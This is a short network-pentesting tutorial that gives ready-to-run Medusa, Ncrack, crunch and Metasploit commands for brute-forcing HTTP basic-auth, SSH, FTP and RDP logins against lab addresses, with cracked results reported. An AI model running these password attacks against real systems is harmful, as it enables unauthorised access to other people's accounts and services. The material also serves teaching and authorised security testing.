Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting

Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting

Apart from using Default Credentials, we can also perform a brute force attack on various services to get into them.

1) HTTP (htaccess protected web directory) 

Medusa comes in rescue when we talk about Basic Authorization or Password Protected Web Directory Cracking

Medusa commmand line to For Cracking Basic Authorization or Password Protected Web Directory

 medusa -h 192.168.11.219 -u admin -P Desktop/demo/password -M http -m DIR:/secret-T 10

Medusa will go ahead and try Crack Password Protected Web Directory by using user as admin and password as provide in password list on Password Protected Web Directory secret. 

2) SSH

Ncrack comes very handy when we talk about SSH Password Cracking, We can crack SSH password using Ncrack

A) ncrack -p 22 --user admin -P Desktop/demo/password 192.168.131.135

Note - We can use crunch to create a wordlist for cracking password.

command format would be : crunch <minpass> <maxass> words > outfile

command : crunch 4 4 abcd123 > password

B) Metasploit:

We can also use Metasploit to Crack SSH password.

Using  auxiliary/scanner/ssh/ssh_login

Set required details following by SET PARAMETERNAME. After setting required thing run/exploit

Metasploit cracked the password.


D) Medusa

We can achieve the Same Goal Using Medusa.

medusa -h 192.168.131.135 -u admin -P Desktop/demo/password -M ssh

Medusa, were successfully able to crack SSH Password.

3) FTP

A) Ncrack

To Crack FTP Password, we can use Ncrack also.

ncrack -p 21 --user admin -P Desktop/demo/password 192.168.0.7 -vv

This time our target machine is : 192.168.0.7

B ) Metasploit

There is an auxiliary for Cracking FTP in metasploit

auxiliary/scanner/ftp/ftp_login

4) RDP (Remote Desktop Protocol)

ncrack -u rdp -P Desktop/demo/password.txt -p rdp 192.168.131.137

Ncrack successfully found the valid password as user "rdp" and password "rdppass".